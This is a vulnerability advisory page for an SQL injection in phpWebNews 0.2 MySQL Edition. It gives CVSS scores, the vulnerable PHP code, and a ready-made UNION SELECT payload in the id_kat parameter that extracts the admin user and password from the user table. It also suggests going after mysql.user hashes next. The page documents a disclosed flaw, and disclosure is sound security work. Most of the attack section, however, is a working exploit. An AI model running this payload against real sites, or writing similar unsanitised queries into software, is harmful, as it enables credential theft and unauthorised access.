phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability

2009.05.24
Credit: sToRm
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

____ _ _ _ ___ __ _ __ / ___| ___ | \ | |_ _| | \ \ / /__ _ _ _ __ ___ ___| |/ _| ___ _ __ __ _ | | _ / _ \| \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` | | |_| | (_) | |\ | |_| | | | | | (_) | |_| | | \__ \ __/ | _| (_) | | | (_| | \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_| |___/\___|_|_|(_)___/|_| \__, | ---------------------------------------------------------------------------|___/ Exploit found by sToRm phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online) SQL Injection SQL Injection ------------- index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user-- $id_kat=$_GET[id_kat]; $m_conn = db_connect(); if ((empty($id_kat))||($id_kat=='')) $m_sql = "select * from berita where status='tampil' and order by tgl desc"; else $m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc"; Here, we have a classic SQL MySQL injection. The GET variable "id_kat" isn't sanitized before being passed to the query. By injecting our string, the query becomes: select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc The comment renders the rest of the query to be useless. We are effectively grabbing the first user from the table "user", which is the admin. You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top